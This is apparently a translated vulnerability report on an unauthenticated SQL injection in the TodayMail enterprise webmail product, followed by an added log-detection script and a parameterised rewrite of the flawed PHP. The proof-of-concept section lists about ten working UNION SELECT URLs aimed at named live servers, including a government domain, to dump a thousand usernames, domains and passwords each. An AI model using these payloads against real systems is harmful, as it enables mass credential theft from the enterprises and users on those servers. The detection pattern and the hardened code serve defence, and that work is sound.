TodayMail: an unauthenticated SQL injection that can easily dump large numbers of enterprise mailbox accounts

Vulnerability author: xfkxfk

Details:

TodayMail (时代企业邮, the Now.cn enterprise mail product) is introduced here:

http://www.now.cn/email/overview.net

Search keyword: 时代企业邮

There are many deployments, so no screenshots of them here.

File: searchAddr.inc.php

<?php
header('Content-Type:text/xml;charset=UTF-8');
include_once "../config/dbremote.inc.php";
include_once "../../core/emailcore.class.inc.php";
// No login-check file is included here, so the script is reachable without authentication.

$value=trim($_REQUEST['value']);    // user-controlled keyword, passed on without any filtering
$tm_id=trim($_REQUEST['ftm_id']);   // tenant id also taken straight from the request

$EmailCore = new EmailCore($tm_id);
$addrList=$EmailCore->searchAddrAllByKeyword($value);

$str="<?xml version=\"1.0\" encoding=\"UTF-8\"?><properties><property>";
$str.="<num>".count($addrList)."</num>";
for($i=0;$i<count($addrList);$i++){
        $str.="<name".$i.">".$addrList[$i]['name']."</name".$i.">";
        $str.="<email".$i.">".$addrList[$i]['email']."</email".$i.">";
}
$str.="</property></properties>";
echo $str;
?>

First:

As you can see, no login-verification file is included, so the script can be accessed directly without logging in.

Then: $value=trim($_REQUEST['value']);

Next: $addrList=$EmailCore->searchAddrAllByKeyword($value);

Following the function searchAddrAllByKeyword into the file emailcore.class.inc.php:

function searchAddrAllByKeyword($value){
        //global $db_remote;
        $addrArray=array();
        // $value is interpolated straight into the LIKE patterns; a quote in it breaks out of the string.
        $sql="select name,email from address  where ftm_id='".$this->TMID."' and (name like '%$value%' or email like '%$value%')";
        // On a query error the SQL text and MySQL error message are echoed back to the client.
        $rs=@$this->mysql->query($sql,$this->db_remote) or die($sql.mysql_error());
        while($array=mysql_fetch_assoc($rs)){
                $addrArray[]=$array;
        }
        // Same pattern against the todaymail table, which also holds tm_passwd.
        $sql="select tm_name as name,tm_domain as email from todaymail  where tm_domain='".$this->EmailInfo['tm_domain']."' and (tm_name like '%$value%' or tm_domain like '%$value%') and tm_status in (1,3) and tm_level <> '1' order by tm_name asc";
//      echo $sql;
        $rs=@$this->mysql->query($sql,$this->db_remote) or die($sql.mysql_error());
        while($array=mysql_fetch_assoc($rs)){
                $array['email']=$array['name']."@".$array['email'];
                $addrArray[]=$array;
        }
        // And a third time against mailcard.
        $sql="select name,email from mailcard  where ftm_id='".$this->TMID."' and (name like '%$value%' or email like '%$value%')";
        $rs=@$this->mysql->query($sql,$this->db_remote) or die($sql.mysql_error());
        while($array=mysql_fetch_assoc($rs)){
                $addrArray[]=$array;
        }
        return $addrArray;
}

It is clear that the variable $value goes straight into the SELECT statements without any filtering, which produces the SQL injection vulnerability.

Here the data is obtained directly, without logging in.

Unfortunately I did not get server privileges, but from the domain names it is clear that a large number of enterprises are on this platform.

Take the official site as an example:

http://webmail.now.cn//webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,%27@@@%27,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361

From the tm_domain field here, 4000 domains can be seen.

[screenshot]

After deduplication there are still more than 3000 domains, which means more than 3000 enterprises.

Proof of vulnerability:

Take the official site as an example:

http://webmail.now.cn//webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361

This reads the username, domain and password of 1000 users.

[screenshot]

A few more examples picked at random:

http://webmail.now.cn//webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361 
http://mail.wfq.gov.cn//webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361
http://streamline.com.cn/webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361
http://mail.inkbank.com.cn/webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361
http://mail.zhangjiang.net/webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361
http://mail.now.net.cn/webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361
http://mx601.now.net.cn/webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361
http://mx605.now.net.cn/webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361
http://mx606.now.net.cn/webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361
http://mx621.now.net.cn/webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361


Moreover, there are many databases, so mail contents and the like will all leak as well.

The user base is large, so this should count as a high-risk vulnerability; the mail systems of many enterprises would essentially all fall.
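Because the endpoint needs no session, the only place an operator will see this happening is the web server's access log. The following is an added detection example, not part of the report: it scans combined-format access-log lines for requests to searchAddr.inc.php whose decoded value parameter carries SQL syntax instead of a plain name or e-mail fragment. The log lines are constructed for the example; the endpoint path and parameter name are the ones shown in the report.

```php
<?php
// Added detection example (not part of the report): flag access-log entries
// that hit searchAddr.inc.php with a keyword that decodes to SQL syntax.
// The sample log lines below are constructed for this example.

declare(strict_types=1);

/**
 * Return true when a combined-format access-log line is a request to
 * searchAddr.inc.php whose decoded `value` looks like SQL rather than an
 * address-book keyword.
 */
function isSuspiciousSearchRequest(string $line): bool
{
    // Request field of the combined log format: "GET /path?query HTTP/1.1"
    if (!preg_match('#"(?:GET|POST) (\S+) HTTP/#', $line, $m)) {
        return false;
    }
    $url = parse_url($m[1]);
    if (!is_array($url) || !isset($url['path'])
        || !preg_match('#/searchAddr\.inc\.php$#', $url['path'])) {
        return false;
    }
    parse_str($url['query'] ?? '', $params);   // percent-decodes the values
    $value = (string) ($params['value'] ?? '');
    // Quotes, parentheses, comment markers or SQL keywords have no place in a
    // keyword that is only meant to match a name or an e-mail address.
    return (bool) preg_match('/[\'")#]|--|\b(?:union|select|concat)\b/i', $value);
}

/** Filter a list of log lines down to the suspicious ones. */
function findSuspicious(array $lines): array
{
    return array_values(array_filter($lines, 'isSuspiciousSearchRequest'));
}

// Constructed sample: one benign lookup, one injection attempt in the style of
// the URLs above, and one request to an unrelated script.
$sampleLog = [
    '203.0.113.5 - - [01/Jan/2014:10:00:00 +0800] "GET /webmail/main/searchAddr.inc.php?value=zhang&ftm_id=103361 HTTP/1.1" 200 311',
    '203.0.113.9 - - [01/Jan/2014:10:00:07 +0800] "GET /webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%201,2%23&ftm_id=103361 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [01/Jan/2014:10:00:09 +0800] "GET /webmail/main/index.php HTTP/1.1" 200 8420',
];

foreach (findSuspicious($sampleLog) as $hit) {
    echo "ALERT: ", $hit, "\n";
}
```

Only the second constructed line is reported: its value decodes to 123%') union select 1,2#, which contains a quote, a closing parenthesis and SQL keywords. A large response size on that same line, as in the report's 1000-row dumps, is a second signal worth alerting on alongside the pattern match.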

Fix:

Include the login-verification file, and filter the input.
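The two halves of that fix applied to the code in the report, as an added example rather than TodayMail's own patch: a login gate that rejects anonymous requests before any database access, and a version of searchAddrAllByKeyword that binds the keyword as a parameter and escapes LIKE wildcards instead of concatenating it into the query. It assumes the product's login flow stores the tenant id in $_SESSION['tm_id'] and its domain in $_SESSION['tm_domain'], and that a mysqli connection to the remote database is available as $db; table and column names are those in the report, and everything else is an assumption.

```php
<?php
// Added example, not TodayMail's code: a hardened searchAddr.inc.php.
// Assumptions: login stores the tenant id in $_SESSION['tm_id'] and its
// domain in $_SESSION['tm_domain']; $db is a mysqli connection (mysqlnd).
declare(strict_types=1);
session_start();

// 1. Login gate. The original included no authentication, so reject anonymous
//    requests first. The tenant id comes from the server-side session, not
//    from the ?ftm_id= request parameter the original trusted.
if (empty($_SESSION['tm_id']) || empty($_SESSION['tm_domain'])) {
    http_response_code(401);
    exit;
}
$tm_id     = (string) $_SESSION['tm_id'];
$tm_domain = (string) $_SESSION['tm_domain'];

// 2. Treat the keyword as data. Bound parameters stop it from altering the
//    statement; escaping %, _ and \ stops it from widening the LIKE pattern.
function escapeLike(string $s): string
{
    return addcslashes($s, '%_\\');
}

/** Run a prepared statement and return all rows as associative arrays. */
function fetchAll(mysqli $db, string $sql, string $types, string ...$params): array
{
    $stmt = $db->prepare($sql);
    if ($stmt === false) {
        // Log server-side only; the original's die($sql.mysql_error())
        // echoed the SQL text and error message to the client.
        error_log('searchAddr prepare failed: ' . $db->error);
        return [];
    }
    $stmt->bind_param($types, ...$params);
    $stmt->execute();
    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
    $stmt->close();
    return $rows;
}

function searchAddrAllByKeywordSafe(mysqli $db, string $tm_id, string $tm_domain, string $value): array
{
    $pattern = '%' . escapeLike($value) . '%';

    $out = fetchAll($db,
        'SELECT name, email FROM address WHERE ftm_id = ? AND (name LIKE ? OR email LIKE ?)',
        'sss', $tm_id, $pattern, $pattern);

    $rows = fetchAll($db,
        'SELECT tm_name AS name, tm_domain AS email FROM todaymail
          WHERE tm_domain = ? AND (tm_name LIKE ? OR tm_domain LIKE ?)
            AND tm_status IN (1, 3) AND tm_level <> \'1\' ORDER BY tm_name ASC',
        'sss', $tm_domain, $pattern, $pattern);
    foreach ($rows as $row) {
        $row['email'] = $row['name'] . '@' . $row['email'];
        $out[] = $row;
    }

    return array_merge($out, fetchAll($db,
        'SELECT name, email FROM mailcard WHERE ftm_id = ? AND (name LIKE ? OR email LIKE ?)',
        'sss', $tm_id, $pattern, $pattern));
}

// 3. Emit the same XML shape as before, but through XMLWriter so that names
//    and addresses coming back from the database are escaped.
$value    = trim((string) ($_REQUEST['value'] ?? ''));
$addrList = searchAddrAllByKeywordSafe($db, $tm_id, $tm_domain, $value);

$w = new XMLWriter();
$w->openMemory();
$w->startDocument('1.0', 'UTF-8');
$w->startElement('properties');
$w->startElement('property');
$w->writeElement('num', (string) count($addrList));
foreach ($addrList as $i => $row) {
    $w->writeElement('name' . $i, (string) $row['name']);
    $w->writeElement('email' . $i, (string) $row['email']);
}
$w->endElement();
$w->endElement();
$w->endDocument();

header('Content-Type: text/xml; charset=UTF-8');
echo $w->outputMemory();
```

Note that the queries never select tm_passwd, and the tenant scope (ftm_id, tm_domain) is fixed by the session rather than the request, so even a logged-in user can only search their own address book. Dropping the ftm_id request parameter also removes the second unvalidated input the original script accepted.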
